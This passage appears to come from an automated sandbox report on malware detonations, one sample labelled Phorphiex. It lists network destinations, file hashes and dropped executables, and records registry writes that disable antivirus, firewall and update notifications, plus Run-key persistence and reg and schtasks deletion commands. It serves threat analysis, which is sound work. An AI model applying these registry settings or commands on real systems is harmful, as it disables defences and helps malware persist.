| RU | 185.215.113.84:5050 |  | tcp |
| EG | 45.241.195.218:40500 |  | tcp |
| IR | 5.74.234.250:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| YE | 134.35.229.224:40500 |  | udp |
| UZ | 217.30.170.27:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| MX | 201.121.56.96:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| YE | 81.91.27.48:40500 |  | udp |
| IR | 5.233.202.172:40500 |  | tcp |
| BR | 177.41.160.39:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| IR | 89.43.96.94:40500 |  | udp |
| PK | 39.43.104.199:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| AF | 149.54.15.174:40500 |  | udp |
Files
memory/2624-132-0x0000000000000000-mapping.dmp
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
memory/1152-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1320-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/4144-140-0x0000000000000000-mapping.dmp
memory/4144-141-0x000002281EEA0000-0x000002281EEC2000-memory.dmp
memory/4144-142-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/4144-143-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/820-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 00e7da020005370a518c26d5deb40691 |
| SHA1 | 389b34fdb01997f1de74a5a2be0ff656280c0432 |
| SHA256 | a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe |
| SHA512 | 9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 57c0543153b3fdefc25f54368215ae49 |
| SHA1 | faa7e4b52d54b98b6f5a3ddae91142098471fbaa |
| SHA256 | 02601023870ac4c865e1a814771c56cd1e8c65f58cfbc1f995468cff334b861b |
| SHA512 | bfb9eeb7c4e1b166f7706803cc50f584fbdff6b2660ef84b2f56d56c6ede3c93b4f62ccce213c6cd638304f04a4ddb69fa4b96a947a8a8b30d5d9e19f3fc8dde |
memory/820-148-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/4640-149-0x0000000000000000-mapping.dmp
memory/820-150-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
memory/1648-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 143a478fb47996f74bbbcdaa252b9e0b |
| SHA1 | 288893a45c1c50f8245a32aa06dfb1ac2ff31c83 |
| SHA256 | 6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b |
| SHA512 | e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8 |
memory/1648-154-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/1648-155-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/3776-156-0x0000000000000000-mapping.dmp
memory/3616-157-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
| MD5 | fdba80d4081c28c65e32fff246dc46cb |
| SHA1 | 74f809dedd1fc46a3a63ac9904c80f0b817b3686 |
| SHA256 | b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398 |
| SHA512 | b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29 |
memory/3932-159-0x00007FF6D87125D0-mapping.dmp
memory/3932-160-0x0000022392D40000-0x0000022392D60000-memory.dmp
memory/3932-161-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp
memory/3932-162-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
153s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\489331092.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
"C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\489331092.exe
C:\Users\Admin\AppData\Local\Temp\489331092.exe
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 |  | tcp |
| US | 209.197.3.8:80 |  | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 185.248.47.58:40500 |  | udp |
| UZ | 87.237.234.21:40500 |  | tcp |
| EG | 197.55.8.190:40500 |  | udp |
| US | 20.189.173.4:443 |  | tcp |
| KG | 31.186.54.109:40500 |  | udp |
| IR | 91.98.117.42:40500 |  | udp |
| IR | 78.38.199.41:40500 |  | udp |
| NL | 87.248.202.1:80 |  | tcp |
| NL | 87.248.202.1:80 |  | tcp |
| NL | 87.248.202.1:80 |  | tcp |
| IR | 2.182.180.212:40500 |  | udp |
| IR | 5.236.118.148:40500 |  | tcp |
| RU | 178.35.166.9:40500 |  | udp |
| IR | 94.183.130.203:40500 |  | udp |
| N/A | 10.231.1.75:40500 |  | udp |
| AO | 154.65.146.137:40500 |  | udp |
| TR | 109.228.205.235:40500 |  | udp |
| IR | 5.238.180.241:40500 |  | tcp |
| IR | 80.210.173.89:40500 |  | udp |
| IR | 134.255.202.200:40500 |  | udp |
| IR | 217.66.207.226:40500 |  | udp |
| YE | 134.35.117.27:40500 |  | udp |
| US | 69.67.151.86:40500 |  | udp |
| AZ | 94.20.233.190:40500 |  | tcp |
| AZ | 94.20.233.124:40500 |  | udp |
| IR | 31.57.179.129:40500 |  | udp |
| AF | 103.83.18.154:40500 |  | udp |
| UA | 78.137.21.80:40500 |  | udp |
| RS | 89.216.189.254:40500 |  | udp |
| IR | 2.187.40.233:40500 |  | tcp |
| UZ | 217.30.162.41:40500 |  | udp |
| UZ | 213.230.111.34:40500 |  | udp |
| N/A | 10.231.11.131:40500 |  | udp |
| N/A | 46.42.62.168:40500 |  | udp |
Files
memory/4364-132-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
memory/4344-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/4344-138-0x0000000000100000-0x0000000000106000-memory.dmp
memory/4044-139-0x0000000000000000-mapping.dmp
memory/3700-140-0x0000000000000000-mapping.dmp
memory/204-141-0x0000000000000000-mapping.dmp
memory/1288-142-0x0000000000000000-mapping.dmp
memory/4344-143-0x00007FFC178F0000-0x00007FFC183B1000-memory.dmp
memory/4344-144-0x00007FFC178F0000-0x00007FFC183B1000-memory.dmp
memory/1704-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\489331092.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral13
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
137s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371128492" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{594ADA81-3F1E-11ED-B390-DA7E66F9F45D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{594AB371-3F1E-11ED-B390-DA7E66F9F45D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
